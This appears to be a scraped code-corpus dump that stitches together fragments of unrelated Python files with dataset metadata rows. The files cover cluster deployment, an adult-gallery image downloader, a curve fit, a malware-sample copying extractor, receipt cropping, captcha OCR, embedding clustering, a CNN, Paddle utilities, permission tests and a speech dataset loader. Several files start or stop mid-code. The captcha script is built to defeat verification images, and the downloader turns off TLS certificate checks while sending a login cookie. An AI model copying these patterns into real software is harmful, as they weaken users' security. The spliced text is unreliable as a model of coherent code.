    parser.add_argument(
        '--master_volume_size', help='volume size for master node of k8s cluster', type=int,
        default=20)
    parser.add_argument(
        '--account_name', help='Nuvoloso account name', default='Demo Tenant')
    parser.add_argument(
        '--create_only', help='Create cluster only, skip Nuvoloso config', action='store_true')
    args = parser.parse_args()
    assert(args.kops_cluster_name and args.region and args.kops_state_store and args.aws_access_key
           and args.aws_secret_access_key), "Some/all input parameters are not filled. Aborting"
    if not args.create_only and args.nuvo_kontroller_hostname is None:
        logging.error("Must specify nuvo kontroller hostname")
        return
    # Logs go to an explicit dir or a fresh ~/logs-<random-5-chars> dir.
    home_dir = pathlib.Path.home()
    args.log_dirpath = args.log_dirpath if args.log_dirpath else str(home_dir.joinpath("logs-%s" % str(uuid.uuid4())[:5]))
    pathlib.Path(args.log_dirpath).mkdir(parents=True, exist_ok=True)
    logging.basicConfig(format='%(asctime)s %(message)s', filename=pathlib.Path(args.log_dirpath).joinpath(
        "%s.log" % os.path.basename(__file__)), level=logging.INFO)
    print("Script to deploy an application cluster")
    test = CreateAppCluster(args)
    nuvo_cluster_name = test.create_application_cluster()
    if not args.create_only:
        # Persist the Nuvo cluster name for downstream pipeline steps.
        with open(NUVO_CLUSTER_NAME, 'w') as fd:
            fd.write(nuvo_cluster_name)
        logging.info("Application cluster name created: %s", nuvo_cluster_name)
    else:
        logging.info("Application cluster created: %s", args.kops_cluster_name)


if __name__ == '__main__':
    main()
| Nuvoloso/testing_open_source | testingtools/deploy_app_cluster.py | deploy_app_cluster.py | py | 6,776 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nuvoloso.api.nuvo_management.NuvoManagement",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "nuvoloso.dependencies.kubectl_helper.KubectlHelper",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "nuvoloso.dependencies.install_packages.InstallPack... |
75002646183 | from concurrent.futures import ThreadPoolExecutor,wait,as_completed
from socket import timeout
from turtle import done
from unittest.result import failfast
import requests
import re
import warnings
import os
import traceback
import importlib
# Silence all warnings (requests with verify=False below is noisy).
warnings.filterwarnings('ignore')
url = 'https://e-hentai.org'
slist = []  # per-image page tokens collected from every gallery page
cookie = input("input your login cookie if any:")
# Browser-like headers; a login cookie (if given) unlocks full-size downloads.
head = {
    "Connection": '''keep-alive''',
    "Pragma": '''no-cache''',
    "Cache-Control": '''no-cache''',
    "sec-ch-ua": '''" Not A;Brand";v="99", "Chromium";v="98", "Microsoft Edge";v="98"''',
    "sec-ch-ua-mobile": '''?0''',
    "sec-ch-ua-platform": '''"Windows"''',
    "DNT": '''1''',
    "Upgrade-Insecure-Requests": '''1''',
    "User-Agent": '''Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.43''',
    "Accept": '''text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9''',
    "Sec-Fetch-Site": '''same-origin''',
    "Sec-Fetch-Mode": '''navigate''',
    "Sec-Fetch-User": '''?1''',
    "Sec-Fetch-Dest": '''document''',
    "Referer": '''https://e-hentai.org/home.php''',
    "Accept-Encoding": '''gzip, deflate, br''',
    "Accept-Language": '''zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6''',
    "Cookie": f"{cookie}"
}
gid = input("example url:https://e-hentai.org/g/2134055/c28c645647/?p=1\nexample gallery id:2134055/c28c645647\ninput the e-hentai gallery id to download:")
# exist_ok replaces the previous bare try/except: pass, which hid every error.
os.makedirs(gid, exist_ok=True)
res = requests.get(f"{url}/g/{gid}", verify=False, headers=head)
# Locate the last pager link to work out how many gallery pages exist.
endp = res.text.rfind(f'''</a></td><td onclick="document.location=this.firstChild.href"><a href="{url}/g/{gid}/?p=1" onclick="return false">''')
count = res.text[:endp]
try:
    count = int(count[count.rfind(">") + 1:])
except ValueError:
    # Single-page galleries have no pager link to parse.
    count = 1
print("pages:", count)
reslist = re.findall('''<a href="https:\/\/e-hentai\.org\/s\/([a-z\d\-/]+?)">''', res.text)
slist.extend(reslist)
def get_limit():
    """Return the account's current download-quota usage scraped from the home page."""
    res = requests.get(f"{url}/home.php", verify=False, headers=head)
    relist = re.findall('''<p>You are currently at <strong>(\d+?)<\/strong>''', res.text)
    return relist[0]
# Logged-in accounts have a download quota; show current usage up front.
if cookie:
    print("limit used:", get_limit())
def fetch_urls(pid):
    """Collect the per-image page tokens of gallery page *pid* into the shared slist."""
    global count, slist
    print(f"fetching page {pid}/{count}...")
    res = requests.get(f"{url}/g/{gid}/?p={pid}", verify=False, headers=head)
    reslist = re.findall('''<a href="https:\/\/e-hentai\.org\/s\/([a-z\d\-/]+?)">''', res.text)
    slist.extend(reslist)
# Fetch the remaining gallery pages concurrently (page 0 was fetched above).
threads = ThreadPoolExecutor(20)
for i in range(1, count):
    threads.submit(fetch_urls, i)
threads.shutdown(True)  # block until every page fetch has finished
sdict = {each: None for each in slist}  # token -> resolved full-size image URL cache
# finally:
num = len(slist)
print("total images:", num)
def fetch_images(i, key):
    """Download image *i*, identified by page token *key*, into the gallery folder.

    With a login cookie the original full-size image is fetched (the resolved
    real URL is cached in sdict); without one the 1280px preview is saved.
    """
    global num, sdict, slist
    print(f"fetching image {i}/{num}...")
    if sdict[key]:
        # A real image URL was already resolved for this token; reuse it.
        print(f"cache {key} found!")
        res = requests.get(sdict[key], verify=False, headers=head, timeout=600)
        open(f"{gid}/{key[key.rfind('/')+1:]}.jpg", "wb").write(res.content)
    else:
        res = requests.get(f"{url}/s/{key}", verify=False, headers=head)
        # print(res.text)
        if cookie:
            # Unescape HTML-encoded ampersands in the fullimg query string.
            ourl = re.findall('''<a href="(https:\/\/e-hentai\.org\/fullimg\.php\?[\w=;&\-]+?)">''', res.text)[0].replace("&amp;", "&")
            # print(ourl)
            # fullimg.php answers with a redirect to the real image host.
            res = requests.get(ourl, verify=False, headers=head, allow_redirects=False)
            rurl = res.headers["location"]
            print(f"resolving real img url of {key}...", rurl)
            sdict[key] = rurl
            res = requests.get(rurl, verify=False, headers=head, timeout=600)
            open(f"{gid}/{key[key.rfind('/')+1:]}.jpg", "wb").write(res.content)
            print("limit used:", get_limit())
        else:
            murl = re.findall('''<img id="img" src="([\w:/;=\.\-]+?)"''', res.text)[0]
            res = requests.get(murl, verify=False, headers=head)
            print(f"not login! download 1280 img url of {key}...", murl)
            open(f"{gid}/{key[key.rfind('/')+1:]}_1280.jpg", "wb").write(res.content)
    # NOTE(review): original indentation was lost in extraction; assuming the
    # completed token is removed for every branch. Mutating the shared slist
    # from worker threads while later batches slice it is racy — verify.
    slist.remove(key)
# Download images in batches of 60 worker submissions.
with ThreadPoolExecutor(max_workers=60) as t:
    for j in range(int((num + 59) // 60)):
        all_task = [t.submit(fetch_images, i + j * 60, each) for i, each in enumerate(slist[j * 60:(j + 1) * 60])]
        lastundo = []
        undo = all_task
        # Poll until the set of unfinished futures stops shrinking (or all done).
        while len(lastundo) != len(undo):
            lastundo = undo
            done, undo = wait(all_task, timeout=300)
            # print(done,undo)
# Dump the URL cache and any tokens left undone for later inspection/resume.
open(f"{gid}/info.py", "w").write(f"{sdict}\n{slist}")
{
"api_name": "warnings.filterwarnings",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "re.findall",
"li... |
71930911465 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 5 20:17:37 2017
@author: afranio
"""
import numpy as np
import matplotlib.pyplot as plt
# dados experimentais
# benzeno - pressao de vapor X temperatura
# experimental data
# benzene - vapor pressure X temperature
P = np.array([   1,    5,   10,   20,   40,   60,  100,  200,  400,  760]) # mmHg
T = np.array([-36.7,-19.6,-11.5, -2.6,  7.6, 15.4, 26.1, 42.2, 60.6, 80.1]) # C

# degree of the polynomial to fit
n = 4

# fit the polynomial
c = np.polyfit(T, P, n)

# evaluate the polynomial at each T (compare with the experimental data)
z = np.polyval(c, T)

# "continuous" T domain (to plot the correlation)
Tc = np.arange(-37, 81.1, 0.1)

# Evaluate the fit with np.polyval instead of the previous hand-expanded
# degree-4 expression, so the plot follows any choice of n above.
plt.plot(Tc, np.polyval(c, Tc), '-', T, P, '*')
plt.title('Pressao de vapor benzeno - ajustada com polinomio de quarto grau')
plt.xlabel('T (C)')
plt.ylabel('P (mm Hg)')
{
"api_name": "numpy.array",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.polyfit",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "numpy.polyval",
"line_numbe... |
23314260402 | import logging
import os
from malware_extractor import MalwareExtractor
logger = logging.getLogger(__name__)
class VXVaultExtractor(MalwareExtractor):
    """Extractor for VXVault collector output.

    The collected files are already plain zip files, so "extraction" is a
    straight copy from the collector path to the extractor path.
    """

    def process_input(self):
        # files are just zip files, so can simply copy those across
        self.copy_files()
if __name__ == "__main__":
logger.info("VXVault Extractor starting up.")
# assume mounted path is path to directory of files, so skipping any need for sub-directories.
collector_path = os.environ.get("COLLECTOR_PATH")
extractor_path = os.environ.get("EXTRACTOR_PATH")
extractor = VXVaultExtractor(collector_path, extractor_path)
extractor.process_input()
logger.info("VXVault Extractor completed.")
| g-clef/malware_extractor | VXVaultExtractor.py | VXVaultExtractor.py | py | 708 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "malware_extractor.MalwareExtractor",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "os.environ.get",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os... |
26498800829 | import requests
import json
import numpy as np
import cv2
import os
from tqdm import tqdm
def crop_receipt(raw_img):
    """Crop receipt from a raw image captured by phone.

    Sends the JPEG-encoded image to the detection service; if a receipt box is
    found, crops it and asks the rotation service whether the crop needs a
    90/180-degree correction (applied only above 0.6 confidence).

    Args:
        raw_img ([np.array]): Raw image containing receipt

    Returns:
        cropped_receipt ([np.array]): The cropped (and possibly rotated)
        receipt, or *raw_img* unchanged when no receipt was detected.
    """
    CROP_RECEIPT_URL = 'http://service.aiclub.cs.uit.edu.vn/receipt/ript_detect'
    ROTATE_RECEIPT_URL = 'http://service.aiclub.cs.uit.edu.vn/receipt/ript_rotate90/'
    _, img_encoded = cv2.imencode('.jpg', raw_img)
    # .tobytes() replaces the numpy .tostring() alias removed in recent numpy.
    detect_receipt = requests.post(CROP_RECEIPT_URL, files={"file": (
        "filename", img_encoded.tobytes(), "image/jpeg")}).json()
    receipt_box = detect_receipt['receipt']
    if receipt_box is not None:
        # Box is [x1, y1, x2, y2]; numpy slicing is rows (y) first.
        crop = raw_img[receipt_box[1]:receipt_box[3], receipt_box[0]:receipt_box[2]]
        img_crop_request = cv2.imencode('.jpg', crop)[1]
        files = [
            ('img', img_crop_request.tobytes())
        ]
        # Use the module constant instead of repeating the URL literal.
        rotated_func = requests.request("POST", ROTATE_RECEIPT_URL, files=files).text
        rotated_func = rotated_func.split('\n')
        # Line 0 names the cv2 rotation (or 'None'); line 1 is the confidence.
        if rotated_func[0] != 'None' and float(rotated_func[1]) > 0.6:
            dic_rotate_fuc = {'ROTATE_90_CLOCKWISE': cv2.ROTATE_90_CLOCKWISE, 'ROTATE_90_COUNTERCLOCKWISE': cv2.ROTATE_90_COUNTERCLOCKWISE, 'ROTATE_180': cv2.ROTATE_180}
            crop = cv2.rotate(crop, dic_rotate_fuc[rotated_func[0]])
        return crop
    return raw_img
{
"api_name": "cv2.imencode",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "requests.post",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "cv2.imencode",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "requests.request",
"line_... |
12526381398 | from PIL import ImageGrab,Image
import pytesseract
def yz_code():
# bbox = (1348, 423, 1455, 455) # 截图范围,这个取决你验证码的位置
# img = ImageGrab.grab(bbox=bbox)
# img.save("D:\\py\\login\\image_code.jpg") # 设置路径
# img.show()
img = Image.open('img5.bmp') # PIL库加载图片
# print img.format, img.size, img.mode # 打印图片信息
img = img.convert('RGBA') # 转换为RGBA
pix = img.load() # 读取为像素
for x in range(img.size[0]): # 处理上下黑边框
pix[x, 0] = pix[x, img.size[1] - 1] = (255, 255, 255, 255)
for y in range(img.size[1]): # 处理左右黑边框
pix[0, y] = pix[img.size[0] - 1, y] = (255, 255, 255, 255)
for y in range(img.size[1]): # 二值化处理,这个阈值为R=95,G=95,B=95
for x in range(img.size[0]):
if pix[x, y][0] < 95 or pix[x, y][1] < 95 or pix[x, y][2] < 95:
pix[x, y] = (0, 0, 0, 255)
else:
pix[x, y] = (255, 255, 255, 255)
img.save("img5.png") # 由于tesseract限制,这里必须存到本地文件
image_temp = Image.open('img5.png')
signin_code = pytesseract.image_to_string(image_temp,lang='eng')
print(signin_code)
yz_code()
| SuneastChen/other_python_demo | 其他实例/验证码识别/图片处理1_pytesseract识别.py | 图片处理1_pytesseract识别.py | py | 1,285 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PIL.Image.open",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "PIL.Image.open",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number"... |
71202438503 | # -*- coding: utf-8 -*-
# @Author: Luis Condados
# @Date: 2023-09-09 18:46:06
# @Last Modified by: Luis Condados
# @Last Modified time: 2023-09-16 18:33:43
import fiftyone as fo
import fiftyone.zoo as foz
import fiftyone.brain as fob
from sklearn.cluster import KMeans
import click
import logging
logging.basicConfig(level=logging.INFO)
def create_dataset_from_dir(images_dir, name=None, persistent=False):
dataset = fo.Dataset.from_images_dir(images_dir=images_dir,
name=name,
persistent=persistent,
recursive=True)
return dataset
@click.command()
@click.option('--images_dir', '-i')
@click.option('--dataset_name', '--name', '-n')
@click.option('--persistent', '-p', type=bool, default=True, is_flag=True)
@click.option('--n_clusters', default=None, type=int)
def main(images_dir, dataset_name, persistent, n_clusters):
if fo.dataset_exists(dataset_name):
logging.info('Dataset {} already exists.'.format(dataset_name))
dataset = fo.load_dataset(dataset_name)
else:
dataset = create_dataset_from_dir(images_dir, dataset_name)
dataset.persistent = persistent
####################
# Compute embeddings
####################
logging.info('Computing embedding ...')
#TIP: run foz.list_zoo_models() to see the whole list of models
# model = foz.load_zoo_model("mobilenet-v2-imagenet-torch")
model = foz.load_zoo_model('clip-vit-base32-torch')
embeddings = dataset.compute_embeddings(model)
logging.info('Working on the 2D for visualization ...')
# Image embeddings
fob.compute_visualization(dataset,
brain_key="latent_space",
embeddings=embeddings,
)
# to enable the "search for similarity" feature
fob.compute_similarity(dataset, embeddings=embeddings)
####################
# K-means Clustering
####################
if n_clusters != None:
logging.info('Computing k-means clustering ...')
k_means = KMeans(init="k-means++", n_clusters=n_clusters, n_init=10)
k_means.fit(embeddings)
for i, sample in enumerate(dataset):
cluster_id = k_means.labels_[i]
sample['cluster_id'] = cluster_id
sample.save()
################
# Launch the App
################
session = fo.launch_app(dataset)
# Blocks execution until the App is closed
session.wait()
if __name__ == "__main__":
main() | Gabriellgpc/exploratory_image_data_analysis | workspace/demo.py | demo.py | py | 2,617 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "fiftyone.Dataset.from_images_dir",
"line_number": 19,
"usage_type": "call"
},
{
"api_name":... |
27890676766 | # -*- coding: utf-8 -*-
import tensorflow as tf
import tensorflow.examples.tutorials.mnist.input_data as input_data
import pdb
def weight_variable(shape):
"初始化权重"
initial = tf.truncated_normal(shape,stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
"初始化偏置项"
initial = tf.constant(.1,shape=shape)
return tf.Variable(initial)
def conv2d(x,W):
"1步长,0边距的卷积"
return tf.nn.conv2d(x,W,strides=[1,1,1,1],padding="SAME")
def max_pool_2x2(x):
"2x2的池化操作"
return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding="SAME")
if __name__ == "__main__":
x = tf.placeholder("float", shape=[None, 784])
y_ = tf.placeholder("float", shape=[None, 10])
mnist = input_data.read_data_sets("MNIST_data",one_hot=True)
sess = tf.InteractiveSession()
# create CNN
W_conv1 = weight_variable([5,5,1,32]) # 32个卷积核
b_conv1 = bias_variable([32])
x_image = tf.reshape(x,[-1,28,28,1])
h_conv1 = tf.nn.relu(conv2d(x_image,W_conv1)+b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
W_conv2 = weight_variable([5,5,32,64]) # 64个卷积核
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1,W_conv2)+b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
W_fc1 = weight_variable([7*7*64,1024]) # 图片尺寸减小为 7x7, 输入channel为 64,输入总数为 7x7x64???? 前面的padding 用的same, 这里图片大小应该还是28x28??
b_fc1 = bias_variable([1024])
h_pool2_flat = tf.reshape(h_pool2,[-1,7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat,W_fc1)+b_fc1)
keep_prob = tf.placeholder("float")
h_fc1_drop = tf.nn.dropout(h_fc1,keep_prob)
W_fc2 = weight_variable([1024,10])
b_fc2 = bias_variable([10])
y_conv = tf.nn.softmax(tf.matmul(h_fc1_drop,W_fc2)+b_fc2)
cross_entropy = -tf.reduce_sum(y_*tf.log(y_conv))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(y_conv,1),tf.argmax(y_,1))
accuarcy = tf.reduce_mean(tf.cast(correct_prediction,"float"))
sess.run(tf.initialize_all_variables())
for i in range(500):
batch = mnist.train.next_batch(50)
if i % 100 == 0:
train_accuracy = accuarcy.eval(feed_dict={x:batch[0],y_:batch[1],keep_prob:1.0})
print("step %d, trainning accuarcy %g"%(i,train_accuracy))
train_step.run(feed_dict={x:batch[0],y_:batch[1],keep_prob:0.5})
print("test accuarcy %g"%accuarcy.eval(feed_dict={
x:mnist.test.images,y_:mnist.test.labels,keep_prob:1.0}))
pdb.set_trace()
| RyanWangZf/Tensorflow_Tutorial | Others/simple_CNN.py | simple_CNN.py | py | 2,840 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.truncated_normal",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "tensorflow.Variable",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "tensorflow.constant",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "t... |
4778562539 | from typing import Optional, Tuple, Union
import paddle
import paddle.nn.functional as F
def cast_if_needed(tensor: Union[paddle.Tensor, None],
dtype: paddle.dtype) -> Union[paddle.Tensor, None]:
"""Cast tensor to dtype"""
return tensor if tensor is None or tensor.dtype == dtype else paddle.cast(tensor, dtype)
def cast_if_needed_inplace(tensor: Union[paddle.Tensor, None],
dtype: paddle.dtype) -> Union[paddle.Tensor, None]:
"""Cast tensor to dtype (inplace), not to be used on layer inputs"""
return tensor if tensor is None or tensor.dtype == dtype else tensor._to(dtype=dtype)
def check_dim_for_fp8_forward_exec(tensor: paddle.Tensor) -> bool:
"""For fp8 fprop (TN layout), inputs and weights must be such
that dim0 is divisible by 8 and dim1 is divisible by 16.
"""
return not tensor.shape[0] % 8 and not tensor.shape[1] % 16
def assert_dim_for_fp8_forward_exec(tensor: paddle.Tensor) -> None:
"""For fp8 fprop (TN layout), inputs and weights must be such
that dim0 is divisible by 8 and dim1 is divisible by 16.
"""
# single tensor check so it's clear which tensor is triggering the assertion
assert check_dim_for_fp8_forward_exec(tensor), (
"Tensor dimensions are not compatible for FP8 execution: "
f"({tensor.shape[0]} % 8 != 0, {tensor.shape[1]} % 16 != 0)")
def get_bias_dtype(activation_dtype: paddle.dtype):
"""Get bias dtype given activation_dtype"""
return paddle.bfloat16 if activation_dtype == paddle.float32 else activation_dtype
def get_paddle_act_func(activation):
"""Get paddle activation function"""
funcs = {
'gelu': F.gelu,
'relu': F.relu,
}
if activation not in funcs:
raise "Activation type " + activation + " is not supported."
return funcs[activation]
def attention_mask_func(attention_scores: paddle.Tensor,
attention_mask: paddle.Tensor) -> paddle.Tensor:
"""Get attention mask"""
def _masked_fill(x, mask, value):
y = paddle.full(x.shape, value, x.dtype)
return paddle.where(mask, y, x)
attention_scores = _masked_fill(attention_scores, attention_mask, -10000.0)
return attention_scores
def mask_to_cu_seqlens(mask: paddle.Tensor, need_kv: bool = False) -> paddle.Tensor:
"""Convert mask to cu_seqlens"""
assert 'bool' in str(mask.dtype), "mask must be bool dtype"
assert len(mask.shape) == 4 and mask.shape[1] == 1, "mask must be [b, 1, s_q, s_kv]"
q_actual_seqlens = paddle.sum(mask[:, :, :, 0] == False, axis=(-1, -2), dtype='int32') # pylint: disable=singleton-comparison
q_cu_seqlens = paddle.cumsum(q_actual_seqlens)
q_cu_seqlens = paddle.concat([paddle.zeros([1], dtype=paddle.int32), q_cu_seqlens], axis=0)
if not need_kv:
return q_cu_seqlens, None
kv_actual_seqlens = paddle.sum(mask[:, :, 0, :] == False, axis=(-1, -2), dtype='int32') # pylint: disable=singleton-comparison
kv_cu_seqlens = paddle.cumsum(kv_actual_seqlens)
kv_cu_seqlens = paddle.concat([paddle.zeros([1], dtype=paddle.int32), kv_cu_seqlens], axis=0)
return q_cu_seqlens, kv_cu_seqlens
def divide(numerator: int, denominator: int) -> int:
"""Ensure that numerator is divisible by the denominator and return
the division value."""
assert (numerator % denominator == 0), f"{numerator} is not divisible by {denominator}"
return numerator // denominator
def save_for_backward_allow_none(ctx, *args) -> None:
"""Save tensors for backward. Args could be None"""
indices_mapping = []
tensors_to_save = []
for x in args:
if isinstance(x, paddle.Tensor):
indices_mapping.append(len(tensors_to_save))
tensors_to_save.append(x)
elif x is None:
indices_mapping.append(-1)
else:
raise ValueError(f"Type {type(x)} is not allowed.")
ctx._indices_mapping = indices_mapping
ctx.save_for_backward(*tensors_to_save)
def saved_tensor_allow_none(ctx) -> Tuple[Optional[paddle.Tensor]]:
"""Used with `save_for_backward_allow_none` in pair. Get saved tensors from ctx."""
assert hasattr(ctx, '_indices_mapping'), "`saved_tensor_allow_none` must be used " \
"with `save_for_backward_allow_none` in pair."
indices_mapping = ctx._indices_mapping
outputs = []
saved_tensors = ctx.saved_tensor()
for index in indices_mapping:
if index < 0:
outputs.append(None)
else:
outputs.append(saved_tensors[index])
return tuple(outputs)
| NVIDIA/TransformerEngine | transformer_engine/paddle/utils.py | utils.py | py | 4,609 | python | en | code | 1,056 | github-code | 36 | [
{
"api_name": "typing.Union",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "paddle.Tensor",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "paddle.dtype",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "paddle.cast",
"lin... |
73060543145 | from tutelary.models import (
PermissionSet, Policy, PolicyInstance
)
from django.contrib.auth.models import User
import pytest
from .factories import UserFactory, PolicyFactory
from .datadir import datadir # noqa
from .settings import DEBUG
@pytest.fixture(scope="function") # noqa
def setup(datadir, db):
user1 = UserFactory.create(username='user1')
user2 = UserFactory.create(username='user2')
user3 = UserFactory.create(username='user3')
PolicyFactory.set_directory(str(datadir))
def_pol = PolicyFactory.create(name='def', file='default-policy.json')
org_pol = PolicyFactory.create(name='org', file='org-policy.json')
prj_pol = PolicyFactory.create(name='prj', file='project-policy.json')
user1.assign_policies(def_pol)
user2.assign_policies(def_pol,
(org_pol, {'organisation': 'Cadasta'}))
user3.assign_policies(def_pol,
(org_pol, {'organisation': 'Cadasta'}),
(prj_pol, {'organisation': 'Cadasta',
'project': 'TestProj'}))
return (user1, user2, user3, def_pol, org_pol, prj_pol)
@pytest.fixture(scope="function") # noqa
def debug(db):
def fn(s):
print(s)
psets = PermissionSet.objects.all()
print('PSets:', list(map(
lambda pset: str(pset.pk) + ': ' + repr(pset.tree()),
psets)
))
pis = PolicyInstance.objects.all()
print('PolInsts:', list(map(lambda pi:
str(pi.pk) + ': ' + str(pi.pset.id) + ' ' +
pi.policy.name + ' ' +
str(pi.variables), pis)))
def nofn(s):
pass
if DEBUG:
return fn
else:
return nofn
def check(nuser=None, npol=None, npolin=None, npset=None):
if nuser is not None:
assert User.objects.count() == nuser
if npol is not None:
assert Policy.objects.count() == npol
if npolin is not None:
assert PolicyInstance.objects.count() == npolin
if npset is not None:
assert PermissionSet.objects.count() == npset
@pytest.mark.django_db # noqa
def test_permission_set_creation(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('CREATION')
check(nuser=3, npol=3, npolin=6, npset=3)
@pytest.mark.django_db # noqa
def test_permission_set_change(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user2.assign_policies(def_pol,
(org_pol, {'organisation': 'DummyCorp'}))
debug('AFTER')
check(nuser=3, npol=3, npolin=6, npset=3)
@pytest.mark.django_db # noqa
def test_permission_set_clear_all(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user1.assign_policies()
user2.assign_policies()
user3.assign_policies()
debug('AFTER')
# Remember the empty permission set!
check(nuser=3, npol=3, npolin=0, npset=1)
@pytest.mark.django_db # noqa
def test_permission_set_clear_single(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user1.assign_policies()
debug('AFTER')
# Remember the empty permission set!
check(nuser=3, npol=3, npolin=5, npset=3)
@pytest.mark.django_db # noqa
def test_permission_user_deletion_single(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user3.delete()
debug('AFTER')
# No empty permission set here: the user is gone!
check(nuser=2, npol=3, npolin=3, npset=2)
@pytest.mark.django_db # noqa
def test_permission_user_deletion_all(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user1.delete()
user2.delete()
user3.delete()
debug('AFTER')
# No empty permission set here: the users are gone!
check(nuser=0, npol=3, npolin=0, npset=0)
| Cadasta/django-tutelary | tests/test_integrity.py | test_integrity.py | py | 4,068 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "factories.UserFactory.create",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "factories.UserFactory",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "factories.UserFactory.create",
"line_number": 14,
"usage_type": "call"
},
{
"a... |
40285478633 | # %%
import logging
import os.path
import shutil
import sys
from typing import Optional
import matplotlib.pyplot as plt
import pandas as pd
import pytorch_lightning as pl
import torch
import torch.nn.functional as F
import torchaudio
from icecream import ic
from torch.utils.data import Dataset, DataLoader
import matplotlib.pyplot as plt
from io import StringIO
try:
from hubert.clustering.filter_dataframe import clean_data_parczech
except ModuleNotFoundError:
from filter_dataframe import clean_data_parczech
class ParCzechDataset(Dataset):
def __init__(self, df_path, resample_rate=16000, df_filters=None, sep='\t', sort=True, train_flag=True, iloc=True, *args, **kwargs):
super(ParCzechDataset, self).__init__()
self.df = pd.read_csv(df_path, sep=sep)
self.filter_df(df_filters)
if train_flag:
self.df = self.df[(self.df.type == 'train') | (self.df.type == 'other')]
if sort:
self.df = self.df.sort_values(by=['duration__segments'], ascending=False).copy().reset_index(drop=True)
self.new_sr = resample_rate
self.resample_transform = None
# this configures the __getitem__ method, when self.iloc is true index in __getitem__ is interpreted as integer location in dataframe
# when self.iloc is False index in __getitem__ is interpreted as an element in self.df.index
self.iloc = iloc
def index_df(self, i, column_name=None):
if self.iloc:
row = self.df.iloc[i]
else:
row = self.df.loc[i]
if column_name is not None:
return row[column_name]
return row
def get_mp3_name(self, i):
row = self.index_df(i)
try:
# need to remove prefix 'sentences_'
mp3_name = row.mp3_name.split('_')[-1]
except:
ic(row)
raise ValueError(f'can not find row by index {i}')
return mp3_name
def extract_path(self, i):
row = self.index_df(i)
mp3_name = self.get_mp3_name(i)
return os.path.join(row.segment_path, mp3_name)
def get_gold_transcript(self, path):
with open(f'{path}.prt', 'r') as f:
return f.read().rstrip()
def get_asr_transcript(self, path):
with open(f'{path}.asr', 'r') as f:
return f.read().rstrip()
def _safe_read_df(self, path, names, header, sep, dtypes, na_values):
if not os.path.isfile(path):
print(f'{path} does not exist')
replace_dict = {
'"': "__double_quotes__",
}
with open(path, 'r') as f:
src = ''.join(f.readlines())
for k, v in replace_dict.items():
src = src.replace(k, v)
df = pd.read_csv(StringIO(src), names=names, header=header, sep=sep, dtype=dtypes, na_values=na_values)
return df
def get_recognized_df(self, path, i):
# will extract recognized based on word ids
header = ['word', 'word_id', 'start_time', 'end_time', 'XXX', 'avg_char_duration', 'speaker']
try:
words_df = self._safe_read_df(
f'{path}.words',
names=header,
header=None,
sep='\t',
# replace_col=['word'],
dtypes=None,
na_values=None,
)
except Exception as e:
ic(path)
ic(e)
raise ValueError(f'Can not read file {path}')
word_ids = words_df['word_id'].values.tolist()
# read aligned file
path_aligned = f"/lnet/express/work/people/stankov/alignment/results/full/words-aligned/jan/words_{self.get_mp3_name(i)}.tsv"
# normalization is done by the length of the "true_word"
header_aligned = ['true_w', 'trans_w', 'joined', 'id', 'recognized', 'dist', 'dist_norm', 'start', 'end', 'time_len_ms', 'time_len_norm']
dtypes = dict(
true_w=str,
trans_w=str,
joined=bool,
id=str,
recognized=bool
)
for name in header_aligned:
if name not in dtypes:
